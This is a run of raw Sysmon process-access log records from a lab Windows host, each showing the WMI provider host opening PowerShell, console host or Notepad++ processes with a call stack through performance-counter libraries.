21:45:41.395{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150821Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.395{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150820Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.395{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150819Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150818Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150817Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150816Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150815Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150814Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150813Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150812Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150811Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150810Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150809Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150808Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150807Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150806Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 